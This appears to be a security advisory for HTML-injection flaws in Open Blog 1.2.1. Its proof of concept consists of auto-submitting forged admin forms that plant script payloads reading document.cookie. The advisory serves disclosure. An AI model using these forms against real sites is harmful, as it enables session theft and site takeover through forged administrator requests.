Muraus Open Blog - Multiple HTML Injection Vulnerabilities

source: https://www.securityfocus.com/bid/42255/info

Tomaž Muraus Open Blog is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

Tomaž Muraus Open Blog 1.2.1 is vulnerable; prior versions may also be affected. 

<form action="http://www.example.com/admin/pages/edit" method="post" >
<input type="hidden" name="title" value="open blog page title" />
<input type="hidden" name="content" value='Some page content and <script>alert(document.cookie)</script>' />
<input type="hidden" name="status" value="active" />
<input type="hidden" name="id" value="1" />
<input type="submit" name="submit" id="sbmtit" value="Edit &rsaquo;&rsaquo;" />
</form>
<script>
document.getElementById('sbmtit').click();
</script>



<form action="http://www.example.com/admin/posts/edit" method="post" >
<input type="hidden" name="title" value="Welcome to Open Blog" />
<input type="hidden" name="excerpt" value='Some text"><script>alert(document.cookie)</script>' />
<input type="hidden" name="content" value="" />
<input type="hidden" name="categories[]" value="1" />
<input type="hidden" name="tags" value="openblog" />
<input type="hidden" name="publish_date" value="13/07/2010" />
<input type="hidden" name="status" value="published" />
<input type="hidden" name="id" value="1" />
<input type="submit" name="submit" id="sbmtit" value="Edit &rsaquo;&rsaquo;" />
</form>
<script>
document.getElementById('sbmtit').click();
</script>